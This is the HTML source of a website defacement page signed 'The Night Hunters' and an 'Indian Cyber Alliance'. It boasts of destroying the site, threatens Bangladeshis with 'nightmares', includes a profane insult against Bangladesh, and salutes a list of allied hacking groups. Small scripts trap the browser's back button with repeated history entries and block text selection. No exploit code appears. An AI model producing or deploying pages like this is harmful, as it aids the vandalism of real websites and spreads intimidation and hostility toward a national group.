<!DOCTYPE html>
<html lang="en">
  <head>
    <body>
      
      
      <title>.::PWNED BY THE NIGHT HUNTERS .::</title>
      <link href="https://fonts.googleapis.com/css2?family=Iceland&display=swap" rel="stylesheet"
      
         <link href="https://fonts.googleapis.com/css?family=Jura" rel="stylesheet" /> 
         
           <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Iceland&family=Kalam:wght@300&display=swap" rel="stylesheet">
      
         <meta charset="utf-8" />
    
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
   
        <style type="text/css">
     body{ background-color:black; } 
    
     h1{ 
       
     text-decoration: none; 
     
     border-radius:0px; 
     
     border:0px; 
     
     font-family: 'Iceland', cursive; 
     
     font-size:22px; 
     
     margin:0px; padding:0px; 
     
     animation:psychoxploit 0.5s linear infinite;
  
     }
     
       h3{
        color:silver;
         font-size: 20px;
         text-shadow: 0px 0px 10px blue;
         font-family:kalam;
  
       }
       
    
     
     pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style>
         <meta name="description" content=" BayxzXploit"> <meta name="author" content="BayxzXploit"/> <meta name="keywords" content="BayxzXploit"/> <meta name="googlebot" content="all"/> <meta name="robots" content="all" /> <meta name="googlebot-news" content="all" /> <meta name="google" content="notranslate"/> <meta name="og:title" content="BayxzXploit"/>
         
     <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script> 

     
     
     <center><img src="https://i.top4top.io/p_30197gmva0.jpg" height="180" widht="180"/><br>
  
     <center><h1><font color="#9d9d9d">PWNED BY </font><font color="silver" > THE NIGHT HUNTERS</h1></font>
     
     <br><br>
     
     <center><font face="Iceland" size="6" color="white">- Hello Bangladesh-<font size="5"> THIS IS A WARING <font face="Iceland" size="5" color="white"> ⚠️ STAY AWAY FROM INDIAN CYBER SPACE🛡
 OR ELSE GET READY FOR NIGHT MARES⚔️-<font face="Iceland" size="6" color="white"></font>
   
      <center><font face="Iceland" size="4" color="white">🥷WE ARE THE NIGHT HUNTERS ⚡️</font>
     
       <center><font size="4" color="white">- ENJOY THE DESTRUCTION OF YOUR WEBSITE -<br><font face="Iceland" color="white">- FUCK BANGLADESH ,JAI HIND, JAI BHARAT-</font>
     
        <br><br>
     
     <center><font size="3" color="red">INDIAN CYBER ALLIANCE </font>
     
     <br><br>
     
           <center><font face="Iceland" size="3" color="silver">" GREETZ"</font>
     
     <br
     
           <center><font face="Iceland" size="3" color="green"><marquee>~ NIGHT HUNTERS || GARUDA OPS || CRYPTIC || MR. ANONYMOUS || D3VIL B0sS || || AnonymousIndia || UnknownCyberCult || Indian_Cyber_Punk || Network_Nine || 404_ERROR || Black_Dragon_Sec || DarkCyberWarrior || GlorySec || ALL INDIAN HACKERS || AND ALL ||~</font></marquee>
           
           <br><br><button class="lagu" onclick="play();liat();"><font face="Pacifico" size="3"> <color="black">Play</font></button> <button class="lagu" onclick="pause(); liat();"><font face="Pacifico" ><font size="2"><font color="black">Pause</font></button> <br><br><audio id="lagu" src="https://files.catbox.moe/omread.mp3"></audio> </audio> <script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } function pause(){ var audio = document.getElementById('lagu'); audio.pause(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } </script></td></tr></table></center>
            
        <center><font face="Iceland" size="5" color="white">- We Are Indian Hacktivist*/ -</font>
          <style>
  body {
    background-image: url('https://files.catbox.moe/8sl75b.jpg');
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat;
  
    margin: 0;
    padding: 0;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    font-family: Arial, sans-serif;
    color: white;
 
  }
</style>
